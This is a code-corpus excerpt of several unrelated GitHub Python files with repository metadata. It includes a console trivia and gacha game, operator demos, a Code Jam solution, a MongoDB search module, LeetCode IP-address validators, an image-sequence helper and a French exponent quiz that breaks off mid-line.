len(Gacha_List.Germany_Uncommon)\r\nGermany_Len_Rare = len(Gacha_List.Germany_Rare)\r\nGermany_Len_UltraRare = len(Gacha_List.Germany_UltraRare)\r\n\r\n### USSR\r\n\r\nGacha_USSR_Len_Uncommon = len(Gacha_List.USSR_Uncommon)\r\nGacha_USSR_Len_Rare = len(Gacha_List.USSR_Rare)\r\nGacha_USSR_Len_UltraRare = len(Gacha_List.USSR_UltraRare)\r\n\r\n### USA\r\n\r\nGacha_USA_Len_Uncommon = 
len(Gacha_List.USA_Uncommon)\r\nGacha_USA_Len_Rare = len(Gacha_List.USA_Rare)\r\nGacha_USA_Len_UltraRare = len(Gacha_List.USA_UltraRare)\r\n\r\nwhile App:\r\n print('''\r\nList of commands:\r\n 1. Trivia\r\n 2. Fun Fek\r\n 3. Help\r\n 4. Gacha Roll\r\n 5. Shutdown''')\r\n\r\n Time = time.localtime()\r\n Time_Hour = Time.tm_hour\r\n Time_Min = Time.tm_min\r\n Time_Zone = Time.tm_zone\r\n\r\n if Time_Hour > 11:\r\n Time_Meridian = 'PM'\r\n else:\r\n Time_Meridian = 'AM'\r\n\r\n print(f'''{Time_Hour}:{Time_Min} {Time_Meridian}\r\n{Time_Zone}\r\n''')\r\n\r\n Initialization = input('Enter a number >>> ')\r\n\r\n## Trivia Command\r\n\r\n if Initialization == '1':\r\n\r\n ## Variables for Trivia\r\n\r\n ## The index for the question and answer must be the same, otherwise it will break down :D\r\n\r\n Trivia_Len = len(Trivia.Trivia_Ques)\r\n Trivia_Correct = '\\nMAN, you answered it correctly!'\r\n Max_Wrong = 3\r\n\r\n ## Coding for Trivia\r\n\r\n Trivia_Loop = True\r\n Trivia_Score = 0\r\n print('\\nRound 1!')\r\n while Trivia_Loop:\r\n Trivia_Random = random.randrange(0,Trivia_Len)\r\n print(f'\\n{Trivia.Trivia_Ques[Trivia_Random]}')\r\n Wrong_Ans = 0\r\n User_Ans = input('Answer >> ')\r\n while Wrong_Ans < Max_Wrong:\r\n Answer = Trivia.Trivia_Ans[Trivia_Random]\r\n\r\n ### Lower case the answer you give so you (and I) dont have to bother using correct capitalization\r\n\r\n User_Lower_Ans = str.lower(User_Ans)\r\n\r\n ### +4 the Wrong_Ans to get to end the second loop without causing \r\n\r\n if User_Lower_Ans == Answer:\r\n print(Trivia_Correct)\r\n Trivia_Score = Trivia_Score + 1\r\n Wrong_Ans = Wrong_Ans + 4\r\n else:\r\n Wrong_Ans = Wrong_Ans + 1\r\n Tries_Left = Max_Wrong - Wrong_Ans\r\n if Wrong_Ans < Max_Wrong:\r\n print(f'\\nYou got it wong~! You\\'ve still got {Tries_Left} tries left~')\r\n else:\r\n print('\\nHA! You failed miserably, loser~!')\r\n \r\n print(\r\nf'''\r\nScore : {Trivia_Score}\r\nContinue?\r\n 1. Yes\r\n 2. No''')\r\n Trivia_Continue = input('Enter a number >>> ')\r\n if Trivia_Continue == '1':\r\n print(f'\\nRound {Trivia_Score + 1}!')\r\n Wrong_Ans = Wrong_Ans + 4\r\n else:\r\n print(\r\nf'''\r\nFinal Score : {Trivia_Score} \r\nThat concludes the Trivia :D''')\r\n\r\n ## Idk why, without the 'break', it prints 'Invalid entry has been detected'\r\n break\r\n\r\n\r\n## Fun fact Command\r\n\r\n if Initialization == '2':\r\n\r\n ## Variables for Fun fek\r\n\r\n Fun_Fact_len = len(Fun_Fact.Fun_Fact_List)\r\n\r\n ## Coding for Fun fek\r\n\r\n Fun_Loop = True\r\n while Fun_Loop:\r\n Fun_Fact_Random = random.randrange(0,Fun_Fact_len)\r\n print(f'\\n{Fun_Fact.Fun_Fact_List[Fun_Fact_Random]}')\r\n print(\r\n'''\\nMore?\r\n 1. No''')\r\n Choice = input('Enter a number >>> ')\r\n if Choice == '1':\r\n break\r\n \r\n## Help Command\r\n\r\n elif Initialization == '3':\r\n print('''\r\nBrief Explanation\r\n\r\n Trivia = A Trivia will be taken from a list, you must answer the Trivia correctly in order to pass it. 
However, you must answer it correctly using the correct capitalization.\r\n Fun fek = A Fun Fact will be taken from a list\r\n \r\nContact the developer through Discord :D, \r\n[Redacted]''')\r\n\r\n## Gacha Roll\r\n\r\n elif Initialization == '4':\r\n\r\n ## Useful statistic\r\n Gacha_Rolled = 0\r\n Germany_Rolled = 0\r\n USA_Rolled = 0\r\n USSR_Rolled = 0\r\n Uncommon_Rolled = 0\r\n Rare_Rolled = 0\r\n UltraRare_Rolled = 0\r\n Uncommon = 0\r\n Rare = 0\r\n Ultra_Rare= 0\r\n\r\n Gacha_Roll = int(str(input('''\\n\r\nEnter the number of times you want to roll >>> ''')))\r\n \r\n ## Gacha System to choose, even odds or unfair odds\r\n Gacha_System = input('''\\n\r\nList of Gacha Systems:\r\n1. Gaijin Style\r\n2. Fair Probability Style\r\nEnter a number >>> ''')\r\n\r\n## Unfair Gaijin Style Gacha (A game company that makes simulation, war, etc genre. The Gacha is inspired by the extremely unfair gacha in a game called 'War Thunder')\r\n \r\n if Gacha_System == '1':\r\n Gacha_Tier_List = ['Ultra Rare']\r\n Uncommon_Repetition = 995\r\n Rare_Repetition = 4\r\n\r\n Repetition_Count = 0\r\n while Repetition_Count < Uncommon_Repetition:\r\n Gacha_Tier_List.append('Uncommon')\r\n Repetition_Count = Repetition_Count + 1\r\n \r\n Repetition_Count = 0\r\n while Repetition_Count < Rare_Repetition:\r\n Gacha_Tier_List.append('Rare')\r\n Repetition_Count = Repetition_Count + 1\r\n print('\\nThe odds of the Gacha has been changed :D, enjoy the Gaijin experience!')\r\n\r\n elif Gacha_System == '2':\r\n print('\\nEnjoy your unadulterated odds :D')\r\n\r\n else:\r\n print('Invalid input has been detected.')\r\n\r\n print('\\nRewards:')\r\n while Gacha_Rolled < Gacha_Roll:\r\n Gacha_Rolled = Gacha_Rolled + 1\r\n\r\n ## So get the index of List of countries and get the country as a string in a variable\r\n\r\n Gacha_Tier_Len = len(Gacha_Tier_List)\r\n Origin = random.randrange(0,Gacha_Country_Len)\r\n Country = Gacha_Country_List[Origin]\r\n Tier_Index = random.randrange(0,Gacha_Tier_Len)\r\n Tier = Gacha_Tier_List[Tier_Index]\r\n\r\n ## Use the assigned variable and then randomly pick an index of that country in order print the vehicle that you the person rolled\r\n if Country == 'Germany':\r\n if Tier == 'Uncommon':\r\n Country_Tier = Gacha_List.Germany_Uncommon\r\n Vehicle = random.randrange(0,Germany_Len_Uncommon)\r\n print(f'{Gacha_Rolled}. {Country_Tier[Vehicle]} (Germany) ({Tier})')\r\n Uncommon_Rolled = Uncommon_Rolled + 1\r\n\r\n elif Tier == 'Rare':\r\n Country_Tier = Gacha_List.Germany_Rare\r\n Vehicle = random.randrange(0,Germany_Len_Rare)\r\n print(f'{Gacha_Rolled}. {Country_Tier[Vehicle]} (Germany) ({Tier})')\r\n Rare_Rolled = Rare_Rolled + 1\r\n\r\n elif Tier == 'Ultra Rare':\r\n Country_Tier = Gacha_List.Germany_UltraRare\r\n Vehicle = random.randrange(0,Germany_Len_UltraRare)\r\n print(f'{Gacha_Rolled}. {Country_Tier[Vehicle]} (Germany) ({Tier})')\r\n UltraRare_Rolled = UltraRare_Rolled + 1\r\n \r\n Germany_Rolled = Germany_Rolled + 1\r\n\r\n\r\n elif Country == 'USSR':\r\n if Tier == 'Uncommon':\r\n Country_Tier = Gacha_List.USSR_Uncommon\r\n Vehicle = random.randrange(0,Gacha_USSR_Len_Uncommon)\r\n print(f'{Gacha_Rolled}. {Country_Tier[Vehicle]} (USSR) ({Tier})')\r\n Uncommon_Rolled = Uncommon_Rolled + 1\r\n\r\n elif Tier == 'Rare':\r\n Country_Tier = Gacha_List.USSR_Rare\r\n Vehicle = random.randrange(0,Gacha_USSR_Len_Rare)\r\n print(f'{Gacha_Rolled}. 
{Country_Tier[Vehicle]} (USSR) ({Tier})')\r\n Rare_Rolled = Rare_Rolled + 1\r\n\r\n elif Tier == 'Ultra Rare':\r\n Country_Tier = Gacha_List.USSR_UltraRare\r\n Vehicle = random.randrange(0,Gacha_USSR_Len_UltraRare)\r\n print(f'{Gacha_Rolled}. {Country_Tier[Vehicle]} (USSR) ({Tier})')\r\n UltraRare_Rolled = UltraRare_Rolled + 1\r\n\r\n USSR_Rolled = USSR_Rolled + 1\r\n\r\n elif Country == 'USA':\r\n if Tier == 'Uncommon':\r\n Country_Tier = Gacha_List.USA_Uncommon\r\n Vehicle = random.randrange(0,Gacha_USA_Len_Uncommon)\r\n print(f'{Gacha_Rolled}. {Country_Tier[Vehicle]} (USA) ({Tier})')\r\n Uncommon_Rolled = Uncommon_Rolled + 1\r\n\r\n elif Tier == 'Rare':\r\n Country_Tier = Gacha_List.USA_Rare\r\n Vehicle = random.randrange(0,Gacha_USA_Len_Rare)\r\n print(f'{Gacha_Rolled}. {Country_Tier[Vehicle]} (USA) ({Tier})')\r\n Rare_Rolled = Rare_Rolled + 1\r\n\r\n elif Tier == 'Ultra Rare':\r\n Country_Tier = Gacha_List.USA_UltraRare\r\n Vehicle = random.randrange(0,Gacha_USA_Len_UltraRare)\r\n print(f'{Gacha_Rolled}. {Country_Tier[Vehicle]} (USA) ({Tier})')\r\n UltraRare_Rolled = UltraRare_Rolled + 1\r\n \r\n USA_Rolled = USA_Rolled + 1\r\n\r\n print(f'''\\n\r\nGacha Statistic:\r\nTotal Roll = {Gacha_Rolled}\r\nGermany Roll = {Germany_Rolled}\r\nUSSR Roll = {USSR_Rolled}\r\nUSA Roll = {USA_Rolled}\r\n\r\nUncommon Rolled = {Uncommon_Rolled}\r\nRare Rolled = {Rare_Rolled}\r\nUltra Rare Rolled = {UltraRare_Rolled}\r\n\r\nProbability:\r\nUncommon = 995/1000\r\nRare = 4/1000\r\nUltra Rare = 1/1000\r\n ''')\r\n\r\n## Exit Command\r\n\r\n elif Initialization == '5':\r\n exit()\r\n\r\n## Response For Invalid Entry\r\n\r\n else:\r\n print('\\nInvalid entry has been detected.')\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n","repo_name":"Stryklar/Projects","sub_path":"Random_Project_1/Random_Project_1 (v1.1)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1191550603","text":"def ternary_operator():\n hungry = True\n x = 'Feed the bear now!' 
if hungry else 'Do not feed the bear.'\n print(x)\n\n\ndef arithmetic_operators():\n x = 10\n y = 3\n z = x / y\n print(f'result is {z}')\n\n z = x // y\n print('integer division result: {}'.format(z))\n\n z = x % y\n print('remainder: ' + f'{z}')\n\n\ndef binary_operators():\n x = 45\n print(f'{x:08b}')\n print(f'{x:02x}')\n\n\nif __name__ == '__main__':\n ternary_operator()\n arithmetic_operators()\n binary_operators()\n","repo_name":"havryliuk/python-test","sub_path":"2020-05-14.py","file_name":"2020-05-14.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23611387881","text":"T = int(raw_input())\r\nfileobj = open(\"3op.txt\",\"w\")\r\nfor t in range(1,T+1):\r\n\r\n\tinp = raw_input().split(' ')\r\n\tM = int(inp[0])\r\n\tN = int(inp[1])\r\n\tres={}\r\n\ttotal=0\r\n\tboard=[]\r\n\toccupied= []\r\n\tfor i in range(M):\r\n\t\ttemp = int(\"0x\"+raw_input(),16)\r\n\t\ttemp_bin = bin(temp)\r\n\t\ttemp_bin = temp_bin[2:len(temp_bin)]\r\n\t\tif len(temp_bin) != N:\r\n\t\t\td= N-len(temp_bin)\r\n\t\t\ttemp_bin= '0'*d+temp_bin\r\n\t\tboard.append( temp_bin )\r\n\t\tocc=[]\r\n\t\tfor j in range(N):\r\n\t\t\tocc.append(0)\r\n\t\toccupied.append(occ)\r\n\r\n\tfor i in range(min(M-1,N-1),-1,-1):\r\n\t\tcurr_board=[]\r\n\t\tcurr_board_size=i+1\r\n\t\tno_of_possible_squares_x= M-i\r\n\t\tno_of_possible_squares_y= N-i\r\n\t\t#print curr_board_size ,no_of_possible_squares_x,no_of_possible_squares_y\r\n\t\tfor each_start_x in range(0,no_of_possible_squares_x):\r\n\t\t\tfor each_start_y in range(0,no_of_possible_squares_y):\r\n\t\t\t\tflag=0\r\n\t\t\t\tprev = ''\r\n\t\t\t\tfor each_y_cell in range(each_start_y,each_start_y+curr_board_size):\r\n\t\t\t\t\tfor each_x_cell in range(each_start_x,each_start_x+curr_board_size):\r\n\r\n\t\t\t\t\t\tif each_y_cell != each_start_y:\r\n\t\t\t\t\t\t\tprev= board[each_x_cell][each_y_cell-1]\r\n\t\t\t\t\t\tcurr_pos = board[each_x_cell][each_y_cell]\r\n\t\t\t\t\t\t#if prev !='':\r\n\t\t\t\t\t\tif (curr_pos == prev) or (occupied[each_x_cell][each_y_cell] == 1):\r\n\t\t\t\t\t\t\tflag=1\r\n\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\t\tprev = curr_pos\r\n\t\t\t\t\tif flag==1:\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\tif flag == 0:\r\n\t\t\t\t\tif curr_board_size not in res.keys():\r\n\t\t\t\t\t\tres[curr_board_size] = 1\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tres[curr_board_size] = res[curr_board_size] +1\r\n\t\t\t\t\ttotal=total+1\r\n\t\t\t\t\tfor each_y_cell in range(each_start_y,each_start_y+curr_board_size):\r\n\t\t\t\t\t\tfor each_x_cell in range(each_start_x,each_start_x+curr_board_size):\r\n\t\t\t\t\t\t\toccupied[each_x_cell][each_y_cell] = 1\r\n\r\n\r\n\tfileobj.write( \"Case #\"+str(t)+\": \"+str(len(res.keys()))+\"\\n\")\r\n\tfor x in sorted(res.keys(),reverse=True):\r\n\t\tfileobj.write(str(x)+\" \"+str(res[x])+\"\\n\")\r\n\t\t\r\n\t#fileobj.write( \"Case #\"+str(t)+\": \"+str(total))\r\nfileobj.close()\r\n\t\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_64/40.py","file_name":"40.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27924224407","text":"##########################\n# Name : Minh Pham\n# Email: minh.pham@columbia.edu\n# Module contains database connection \n# and querying user input \n# the main Sloan app framework \n##########################\n\nfrom itertools import chain\nfrom pymongo import MongoClient, TEXT\n\n\n#create a db 
connection\nclient = MongoClient()\n\n#initialize a database\ndb = client['sloandb']\n\n#all collections\ncollections = [db.job, db.leisure, db.volunteering, db.demographics,\\\ndb.health, db.psychosocial, db.cognitive]\n\ndef get_labels():\n\t'''getting labels for index page'''\n\n\t#getting checkbox selection\n\tcursors = []\n\tfor col in collections:\n\t\tcursors.append(col.aggregate([{\"$group\":\\\n\t\t\t{\"_id\": \"$Database Section\", \"count\": {\"$sum\": 1}}}]))\n\n\t##iterate to create labels\n\tlabs = {}\n\tcursor_str = ['job','lei','vol','demo','hlth','psysoc','cogn']\n\tfor i,j in zip(cursors, cursor_str):\n\t\tx = []\n\t\tfor doc in i:\n\t\t\tx.append(doc['_id'])\n\t\tlabs[j] = x\n\n\treturn labs\n\n\n\ndef search(term):\n\t'''function to receive text search input and returns \n\ta results iterable (not quite a MongoDB cursor) but \n\tshould be fit for purpose'''\n\n\t#create text indices\n\t#search fields: CAC Label + Initial question text\n\tfor col in collections:\n\t\tcol.create_index([('CAC Label', TEXT),\\\n\t\t\t('Question Text - First Wave Available', TEXT)],\\\n\t\t\tname= 'text_search')\n\n\t#search for input\n\tresults = []\n\tfor col in collections:\n\t\tr = col.find({\"$text\": {\"$search\": term}})\n\t\tif r.count() > 0:\n\t\t\tresults.append(r)\n\tdata = [x for x in chain(*results)]\n\n\t#drop text indices\n\tfor col in collections:\n\t\tcol.drop_index('text_search')\n\n\treturn data\n\n\ndef obtain_results(selected):\n\t'''function to gather selected checkboxes or text input'''\n\t\n\toutput = []\n\t\n\tterm = selected.pop()\n\tfor col,i in zip(collections, selected):\n\t\toutput.append(col.find({\"Database Section\" : { \"$in\": i}}))\n\n\tif len(term) > 0:\n\t\toutput.append(search(term))\n\n\treturn output\n","repo_name":"ptmminh/SloanApp","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7431298819","text":"import csv\ndef read_csv(v_object):\n\n reader = csv.reader(v_object)\n\n for row in reader:\n\n print(\",\".join(row))\n\nif __name__ == \"__main__\":\n\n csv_path = \"C:\\\\Users\\\\7307\\\\Downloads\\\\random_python_information.csv\"\n\n with open(csv_path, \"r\") as v_read:\n\n read_csv(v_read)","repo_name":"overdoseflow/i2iSystems-Pyhton-TextManipulation","sub_path":"text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5961506957","text":"import os\nimport logging\nimport pickle\n\nimport torch\nimport torchvision\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nimport al\nfrom al.dataset import mnist\nfrom al.model.model_zoo.simple_cnn import ConvModel\nfrom al.model.mnist import MnistLearner\nfrom al.dataset.mnist import MnistDataset\nfrom al.train.active_train import ActiveTrain\nfrom al.helpers.experiment import set_up_experiment, load_config\nfrom al.experiments import set_up_learner\n\nDATASET = 'mnist'\n\nFOLDER_PATH = os.path.dirname(__file__)\nOUTPUT_DIR, FIGURE_DIR, logger, logger_name = set_up_experiment(\n __file__, FOLDER_PATH, logging_lvl=20)\n\n\nconfig = load_config(FOLDER_PATH, DATASET)\nsetupper = set_up_learner(DATASET)\nconfig['active_learning']['output_dir'] = OUTPUT_DIR\nconfig['experiment']['logger_name'] = logger_name\nmodel_name = config['experiment']['model']\ndataset, learner = setupper(config, OUTPUT_DIR, logger)\n\nqueried = 
os.path.join(os.path.dirname(__file__), 'results',\n 'queries-margin_sampling-0-simplenet.txt')\ndf = pd.read_csv(queried, header=0, skiprows=1)\n# print(df)\nquery_step = 0\nplot_size = 32\nindices = df.loc[query_step].values\n\n\nif False:\n train_dataset = dataset.dataset\n tensor = torch.stack([\n train_dataset[i][0].unsqueeze(0) for i in indices\n ])[:plot_size]\n\n print(tensor.shape)\n\n def show(img):\n npimg = img.numpy()\n plt.imshow(np.transpose(npimg, (1, 2, 0)), interpolation='nearest')\n\n plot_dir = os.path.join(os.path.dirname(__file__), 'figures')\n plt.figure(figsize=(20, 10))\n show(torchvision.utils.make_grid(tensor, nrow=8))\n # plt.title(\"\", fontsize=14)\n plt.tight_layout()\n plt.axis('off')\n plt.show()\n plt.savefig(os.path.join(plot_dir, 'samples.png'), dpi=200)\n\nif True:\n digit = 8\n n = 2\n train_dataset = dataset.dataset\n for i in indices:\n if train_dataset[i][1].numpy() == digit:\n tensor = train_dataset[i][0]\n break\n\n k = 0\n for i in range(len(train_dataset)):\n if train_dataset[i][1].numpy() == digit:\n if k == n:\n clean_tensor = train_dataset[i][0]\n k += 1\n\n plot_dir = os.path.join(os.path.dirname(__file__), 'figures')\n plt.figure(figsize=(20, 10))\n plt.imshow(tensor.numpy(), cmap='gray')\n plt.tight_layout()\n plt.axis('off')\n plt.show()\n plt.savefig(os.path.join(plot_dir, 'digit_bad.png'), dpi=200)\n\n plt.figure(figsize=(20, 10))\n plt.imshow(clean_tensor.numpy(), cmap='gray')\n plt.tight_layout()\n plt.axis('off')\n plt.show()\n plt.savefig(os.path.join(plot_dir, 'digit_clean.png'), dpi=200)\n","repo_name":"kili-technology/active-learning","sub_path":"experiments/mnist_simple/samples.py","file_name":"samples.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"27087548331","text":"class Solution:\n def validIPAddress(self, IP: str) -> str:\n # check IPv4 or IPv6\n if IP.count(\".\") == 3:\n # IPv4 address validation\n return \"IPv4\" if self.checkIPv4(IP) else \"Neither\"\n elif IP.count(\":\") == 7:\n # IPv6 address validation\n return \"IPv6\" if self.checkIPv6(IP) else \"Neither\"\n else:\n return \"Neither\"\n\n def checkIPv4(self, IP):\n tokens = IP.split(\".\")\n for token in tokens:\n if not token.isdigit() or len(token) != len(str(int(token))) or int(token) > 255:\n return False\n return True\n\n def checkIPv6(self, IP):\n tokens = IP.split(\":\")\n for token in tokens:\n if len(token) <1 or len(token) > 4 or any(x in token for x in \"ghijklmnopqrstuvwxyzGHIJKLMNOPQRSTUVWXYZ\"):\n return False\n return True\n\nfrom ipaddress import ip_address, IPv6Address\nclass Solution:\n def validIPAddress(self, IP: str) -> str:\n try:\n return \"IPv6\" if type(ip_address(IP)) is IPv6Address else \"IPv4\"\n except ValueError:\n return \"Neither\"\n\nimport re\nclass Solution:\n def validIPAddress(self, IP: str) -> str:\n chunk_IPv4 = r'([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])'\n patten_IPv4 = re.compile(r'^(' + chunk_IPv4 + r'\\.){3}' + chunk_IPv4 + r'$')\n chunk_IPv6 = r'([0-9a-fA-F]{1,4})'\n patten_IPv6 = re.compile(r'^(' + chunk_IPv6 + r'\\:){7}' + chunk_IPv6 + r'$')\n if patten_IPv4.match(IP):\n return \"IPv4\"\n return \"IPv6\" if patten_IPv6.match(IP) else \"Neither\" \n","repo_name":"Mela2014/lc_punch","sub_path":"lc468_string.py","file_name":"lc468_string.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 
+{"seq_id":"39181484357","text":"import os\nimport re\n\nRE_STEREO = re.compile('(%V)')\nRE_LEFT = re.compile('(left|Left)')\nRE_RIGHT = re.compile('(right|Right)')\nRE_LEFT_RIGHT = re.compile('(left|Left|right|Right)')\n\nRE_FORMAT = re.compile(\"(\\%0(\\d)d)\")\nRE_NUMBERED = re.compile('(\\d+)(?=\\.)')\nRE_PADDING = re.compile('(#+)(?=\\.)')\n\nURL_VIEW_TYPES = [\n\t'mono',\n\t'left',\n\t'right',\n\t'stereo',\n]\n\nclass Seq:\n\tdef __init__(self, url, first=None, last=None):\n\t\tself.url = os.path.abspath(url)\n\t\tif not self._isSequence():\n\t\t\traise ValueError('Url is has no padding: {0}'.format(self.url))\n\t\tself.head = ''\n\t\tself.nLength = 0\n\t\tself.tail = ''\n\t\tself._setParts()\n\t\tself.first = first\n\t\tself.last = last\n\t\tself.viewType = self.getViewType()\n\n\tdef __repr__(self):\n\t\treturn \" {0}%0{1}d{2}\".format(self.head, self.nLength, self.tail)\n\n\tdef _isSequence(self):\n\t\tformat_obj = RE_FORMAT.search(self.url)\n\t\tpadding_obj = RE_PADDING.search(self.url)\n\t\tif not (format_obj or padding_obj):\n\t\t\treturn False\n\t\treturn True\n\n\tdef _setParts(self):\n\t\tformat_obj = RE_FORMAT.search(self.url)\n\t\tpadding_obj = RE_PADDING.search(self.url)\n\t\tif padding_obj:\n\t\t\tself.head = self.url[:padding_obj.start(1)]\n\t\t\tself.tail = self.url[padding_obj.end(1):]\n\t\t\tself.nLength = len(padding_obj.group(1))\n\t\telif format_obj:\n\t\t\tself.head = self.url[:format_obj.start(1)]\n\t\t\tself.tail = self.url[format_obj.end(1):]\n\t\t\tself.nLength = int(format_obj.group(2))\n\n\tdef hasRange(self):\n\t\tif self.first and self.last:\n\t\t\treturn True\n\t\treturn False\n\n\tdef listFramesFromRange(self):\n\t\tframes = []\n\t\tif self.hasRange():\n\t\t\tfor f in range(self.first, self.last+1):\n\t\t\t\tnFile = self.head + str(f).zfill(self.nLength) + self.tail\n\t\t\t\tframes.append(nFile)\n\t\treturn frames\n\n\tdef framesExists(self):\n\t\tif not self.hasRange():\n\t\t\treturn False\n\t\tfor f in self.listFrames():\n\t\t\tif not os.path.exists(f):\n\t\t\t\treturn False\n\t\treturn True\n\n\tdef setRangeFromBiggestChunk(self): # does not consider previous range\n\t\tpaths = self.findBiggestChunk()\n\t\tif paths:\n\t\t\tpatt = \"(\\d{0})\".format(\"{\"+str(self.nLength)+\"}\")\n\t\t\treObj = re.search(patt,paths[0] )\n\t\t\tself.first = int(reObj.group(1))\n\t\t\treObj = re.search(patt,paths[-1] )\n\t\t\tself.last = int(reObj.group(1))\n\n\tdef findExistingFrames(self): # does not consider previous range\n\t\tdir = os.path.split(self.head)[0]\n\t\tfiles = os.listdir(dir)\n\n\t\t#list matches to sequence pattern\n\t\tworthy = []\n\t\tfor f in files:\n\t\t\tpatt = \"(\\d{0})(?=\\.)\".format(\"{\"+str(self.nLength)+\"}\")\n\t\t\tfullpath = os.path.join(dir, f)\n\t\t\treObj = re.search(patt,fullpath )\n\t\t\tif reObj:\n\t\t\t\tif fullpath[:reObj.start(1)] == self.head:\n\t\t\t\t\tif fullpath[reObj.end(1):] == self.tail:\n\t\t\t\t\t\tworthy.append(fullpath)\n\n\t\treturn worthy\n\n\tdef findBiggestChunk(self):\n\t\tworthy = self.findExistingFrames()\n\t\t#chunk sublists ie: [1-10], [12-15], [18-22]\n\t\tif worthy:\n\t\t\tworthy.sort()\n\t\t\tsubSequences = []\n\t\t\tsub = []\n\t\t\tlast = None\n\t\t\tpatt = \"(\\d{0})(?=\\.)\".format(\"{\"+str(self.nLength)+\"}\")\n\t\t\tfor i in worthy:\n\t\t\t\treObj = re.search(patt, i)\n\t\t\t\tn = int(reObj.group(0))\n\n\t\t\t\tif last == None:\n\t\t\t\t\tsub.append(i)\n\t\t\t\t\tlast = n\n\t\t\t\telse:\n\t\t\t\t\tif n == last+1:\n\t\t\t\t\t\tsub.append(i)\n\t\t\t\t\t\tlast = 
n\n\t\t\t\t\telse:\n\t\t\t\t\t\tsubSequences.append(sub)\n\t\t\t\t\t\tsub = []\n\t\t\t\t\t\tlast = None\n\t\t\tsubSequences.append(sub)\n\n\t\t\t#find the longest sublist\n\t\t\tif subSequences:\n\t\t\t\treturn max(subSequences, key=len)\n\n\t\treturn []\n\n\tdef getViewType(self):\n\t\tisStereo = RE_STEREO.search(self.url)\n\t\tisLeft = RE_LEFT.search(self.url)\n\t\tisRight = RE_RIGHT.search(self.url)\n\n\t\tif isStereo:\n\t\t\treturn URL_VIEW_TYPES[3]\n\t\telif isLeft:\n\t\t\treturn URL_VIEW_TYPES[1]\n\t\telif isRight:\n\t\t\treturn URL_VIEW_TYPES[2]\n\t\telse:\n\t\t\treturn URL_VIEW_TYPES[0]","repo_name":"mapoga/FFmpeg","sub_path":"quickSeq.py","file_name":"quickSeq.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34606690258","text":"# demander 2 nombres avec un exposant chacun puis demander le resultat (differante couleur si juste ou faux)\n\n# changer le texte de couleur\n\nclass Couleur:\n Vert= '\\033[92m' \n Bleu = '\\033[94m' \n Rouge = '\\033[91m' \n Normal = '\\033[0m' \n\n\nn1 = int(input(Couleur.Vert + \"Nombre1 sans exposant >> \"))\nexp1 = int(input(\"Exposant 1 >> \"))\n\nprint(Couleur.Bleu, n1 , \"exp\", exp1)\n\n\nn2 = int(input(Couleur.Vert + \"Nombre2 sans exposant >> \"))\nexp2 = int(input(\"Exposant 2 >> \"))\n\nprint(Couleur.Bleu, n1 , \"exp\", exp1,\"*\", n2, \"exp\", exp2, Couleur.Normal)\n\nif n1 == n2 and exp1 == exp2:\n PCreponseExp = exp1 + exp2\n PCreponseNB = n1\n REPnb = int(input(\"Resultat Nombre3 sans exposant >> \")) \n REPexp = int(input(\"Resultat exposant3 >> \"))\n \n if REPnb == PCreponseNB:\n print(Couleur.Vert, REPnb)\n else:\n print(Couleur.Rouge + REPnb)\n\n if REPexp == PCreponseExp:\n print(Couleur.Vert + \"Exposant\", REPexp)\n else:\n print(Couleur.Rouge + \"Exposant\", REPexp) \n\n\nelif n1 == n2:\n PCreponseExp = exp1 + exp2\n PCreponseNB = n1\n REPnb = int(input(\"Resultat Nombre3 sans exposant >> \")) \n REPexp = int(input(\"Resultat exposant3 >> \"))\n \n if REPnb == PCreponseNB:\n print(Couleur.Vert, REPnb)\n else:\n print(Couleur.Rouge + REPnb)\n\n if REPexp == PCreponseExp:\n print(Couleur.Vert + \"Exposant\", REPexp)\n else:\n print(Couleur.Rouge + \"Exposant\", REPexp)\n# OK\n\nelif exp1 == exp2:\n PCreponseNB1 = n1\n PCreponseNB2 = n2\n PCreponseExp = exp1\n \n REPnb1 = int(input(\"Resultat Nombre3.1 sans exposant >> \")) \n REPexp1 = int(input(\"Resultat exposant 3.1 >> \"))\n \n \n REPnb2 = int(input(\"Resultat Nombre3.2 sans exposant >> \")) \n REPexp2 = int(input(\"Resultat exposant 3.2 >> \"))\n\n \n# OK\n \n if REPnb1 == PCreponseNB1:\n Juste1NB = REPnb1\n else:\n Faux1NB = REPnb1\n\n if REPnb2 == PCreponseNB2:\n Juste2NB = REPnb2\n else:\n Faux2NB = REPnb2\n \n if Juste1NB == REPnb1 and Juste2NB == REPnb2:\n print(Couleur.Vert + \"(\",Juste1NB,\"*\",Juste2NB,\")\")\n \n elif Juste1NB != REPnb1 and Juste2NB == REPnb2:\n print(Couleur.Vert + \"(\",Couleur.Rouge, Juste1NB,\" *\",Couleur.Vert,Juste2NB,\")\")\n\n elif Juste1NB == REPnb1 and Juste2NB != REPnb2:\n print(Couleur.Vert + \"(\",Juste1NB,\" *\",Couleur.Rouge,Juste2NB,Couleur.Vert + \")\") \n\n elif Juste1NB != REPnb1 and Juste2NB != REPnb2:\n print(Couleur.Vert + \"(\",Couleur.Rouge, Juste1NB,Couleur.Vert + 